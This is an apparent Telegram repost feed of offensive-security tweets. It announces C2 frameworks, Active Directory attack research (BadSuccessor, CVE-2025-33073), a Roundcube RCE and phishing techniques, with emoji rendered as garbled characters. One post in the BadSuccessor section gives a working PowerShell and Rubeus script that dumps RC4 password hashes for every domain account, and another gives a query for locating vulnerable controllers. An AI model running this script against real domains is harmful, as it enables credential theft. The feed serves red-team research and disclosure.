π [ Bad Sector Labs @badsectorlabs ]
Cobalt Strike for free!? Adaptix C2 (@hacker_ralf) is the best open source C2 I've used since Havoc (@C5pider). SOCKS5, remote and local port forwards, and BOF support! Now it's easy to install the server + client, especially on ποΈLudus with our new role:
π https://github.com/badsectorlabs/ludus_adaptix_c2
π₯ [ tweet ]
Cobalt Strike for free!? Adaptix C2 (@hacker_ralf) is the best open source C2 I've used since Havoc (@C5pider). SOCKS5, remote and local port forwards, and BOF support! Now it's easy to install the server + client, especially on ποΈLudus with our new role:
π https://github.com/badsectorlabs/ludus_adaptix_c2
π₯ [ tweet ]
π₯21π€1π’1
π [ mpgn @mpgn_x64 ]
Thanks to the awesome work of @LadhaAleem , the CTF Windows Active Directory lab for @_barbhack_ from 2024 is now public! π₯
You can build the lab and pwn the AD β 13 flags to capture! No public write-up exists yet β waiting for someone to submit one!
π https://github.com/Pennyw0rth/NetExec-Lab/tree/main/BARBHACK-2024
π₯ [ tweet ]
Thanks to the awesome work of @LadhaAleem , the CTF Windows Active Directory lab for @_barbhack_ from 2024 is now public! π₯
You can build the lab and pwn the AD β 13 flags to capture! No public write-up exists yet β waiting for someone to submit one!
π https://github.com/Pennyw0rth/NetExec-Lab/tree/main/BARBHACK-2024
π₯ [ tweet ]
π₯12
π [ Matt Ehrnschwender @M_alphaaa ]
I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.
π https://github.com/MythicAgents/tetanus
π₯ [ tweet ]
I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.
π https://github.com/MythicAgents/tetanus
π₯ [ tweet ]
ΡΡ
Π²ΠΎΡ Π±ΠΈ Π²ΡΠ΅ Π² ΠΌΠΈΡΠ΅ ΠΏΠ΅ΡΠ΅ΠΏΠΈΡΠ°ΡΡ Π½Π° ΡΠ°ΡΡ π¦ ππ» π¦ ππ»π13π3π2
π [ Steve S. @0xTriboulet ]
rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.
π https://github.com/0xTriboulet/rssh-rs
π₯ [ tweet ]
rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.
π https://github.com/0xTriboulet/rssh-rs
π₯ [ tweet ]
π1
π [ Yehuda Smirnov @yudasm_ ]
What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:
π https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/
π₯ [ tweet ]
What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:
π https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/
π₯ [ tweet ]
π₯9π₯±2π1
π [ Yuval Gordon @YuG0rd ]
π We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it π€·ββοΈ
Read Here -
π https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
π₯ [ tweet ]
π We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it π€·ββοΈ
Read Here -
π https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
π₯ [ tweet ]
π₯9
Offensive Xwitter
π [ Yuval Gordon @YuG0rd ] π We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix itβ¦
π [ Bad Sector Labs @badsectorlabs ]
If this query hits, you're in.
π₯ [ tweet ][ quote ]
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1.name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2.name IN dcs) RETURN c2.nameIf this query hits, you're in.
π₯ [ tweet ][ quote ]
π5
π [ mpgn @mpgn_x64 ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions π₯
π https://github.com/Pennyw0rth/NetExec/pull/702
π₯ [ tweet ][ quote ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions π₯
π https://github.com/Pennyw0rth/NetExec/pull/702
π₯ [ tweet ][ quote ]
π₯11π₯±3π1
π [ David Kennedy @Cyb3rC3lt ]
Python version of BadSuccessor by Cybrly.
π https://github.com/cybrly/badsuccessor
π₯ [ tweet ]
Python version of BadSuccessor by Cybrly.
π https://github.com/cybrly/badsuccessor
π₯ [ tweet ]
π₯6π3π₯±2
This media is not supported in your browser
VIEW IN TELEGRAM
π [ Yuval Gordon @YuG0rd ]
Many missed this on #BadSuccessor: itβs also a credential dumper.
I wrote a simple PowerShell script that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.
π₯ [ tweet ]
upd. Π°Π²ΡΠΎΡ Π΄Π΅Π»Π°Π΅Ρ ΡΡΠΎ-ΡΠΎ ΡΠΈΠΏΠ° ΡΠ°ΠΊΠΎΠ³ΠΎ, Π΅ΡΠ»ΠΈ ΡΡΠΎ, ΡΠΎ ΡΠ²ΠΎΠ΅ΠΉ Π²Π΅ΡΡΠΈΠ΅ΠΉ ΡΡΠ±Π΅ΡΡΠ°:
Many missed this on #BadSuccessor: itβs also a credential dumper.
I wrote a simple PowerShell script that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.
π₯ [ tweet ]
ΠΊΠ°ΠΊΠΎΠΉ ΠΆΠ΅ ΡΠ°Π·ΡΠ΅Π± ππ€£upd. Π°Π²ΡΠΎΡ Π΄Π΅Π»Π°Π΅Ρ ΡΡΠΎ-ΡΠΎ ΡΠΈΠΏΠ° ΡΠ°ΠΊΠΎΠ³ΠΎ, Π΅ΡΠ»ΠΈ ΡΡΠΎ, ΡΠΎ ΡΠ²ΠΎΠ΅ΠΉ Π²Π΅ΡΡΠΈΠ΅ΠΉ ΡΡΠ±Π΅ΡΡΠ°:
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
+ @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
$res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
$rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
"$($_.sAMAccountName):$rc4"
}
π13π₯9π₯±2
π [ Matt Ehrnschwender @M_alphaaa ]
I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.
π https://github.com/MEhrn00/boflink
Supporting blog post about it.
π https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/
π₯ [ tweet ]
I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.
π https://github.com/MEhrn00/boflink
Supporting blog post about it.
π https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/
π₯ [ tweet ]
π7π1
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
β οΈ We've reproduced CVE-2025-49113 in Roundcube.
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube β update immediately!
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube β update immediately!
π₯25π₯±1π1
π [ Aditya Telange @adityatelange ]
evil-winrm-py v1 releasedπ
π https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
π₯ [ tweet ]
evil-winrm-py v1 releasedπ
π https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
π₯ [ tweet ]
π6π₯6
π [ Fabian @testert01 ]
Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.
@micahvandeusen, @_dirkjan, nice tools :)
π https://nothingspecialforu.github.io/UCgMSAExploitation/
π₯ [ tweet ]
Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.
@micahvandeusen, @_dirkjan, nice tools :)
π https://nothingspecialforu.github.io/UCgMSAExploitation/
π₯ [ tweet ]
π6
π [ mr.d0x @mrd0x ]
Finally had some time to publish these blogs. Enjoy!
Spying On Screen Activity Using Chromium Browsers
π https://mrd0x.com/spying-with-chromium-browsers-screensharing/
Camera and Microphone Spying Using Chromium Browsers
π https://mrd0x.com/spying-with-chromium-browsers-camera/
π₯ [ tweet ]
Finally had some time to publish these blogs. Enjoy!
Spying On Screen Activity Using Chromium Browsers
π https://mrd0x.com/spying-with-chromium-browsers-screensharing/
Camera and Microphone Spying Using Chromium Browsers
π https://mrd0x.com/spying-with-chromium-browsers-camera/
π₯ [ tweet ]
π7π₯±4
This media is not supported in your browser
VIEW IN TELEGRAM
π [ James Woolley @Xtrato ]
I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions π
π₯ [ tweet ]
I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions π
π₯ [ tweet ]
π₯±20π7π5π3π€―1
π [ RedTeam Pentesting @RedTeamPT ]
π¨ Our new blog post about Windows CVE-2025-33073 which we discovered is live.
πͺ The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:
π https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
π We have also released a paper which really goes into the nitty-gritty for those who are interested:
π https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf
π₯ [ tweet ]
π¨ Our new blog post about Windows CVE-2025-33073 which we discovered is live.
πͺ The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:
π https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
π We have also released a paper which really goes into the nitty-gritty for those who are interested:
π https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf
π₯ [ tweet ]
π₯11
π [ Synacktiv @Synacktiv ]
Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d.
π https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
π₯ [ tweet ]
Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d.
π https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
π₯ [ tweet ]
π₯±8π4
π [ Praetorian @praetorianlabs ]
π¨ New attack disclosed: GitHub Device Code Phishing
John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.
π Blog covers methodology, red team case studies & detection strategies
π https://www.praetorian.com/blog/introducing-github-device-code-phishing/
π₯ [ tweet ]
π¨ New attack disclosed: GitHub Device Code Phishing
John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.
π Blog covers methodology, red team case studies & detection strategies
π https://www.praetorian.com/blog/introducing-github-device-code-phishing/
π₯ [ tweet ]
π₯7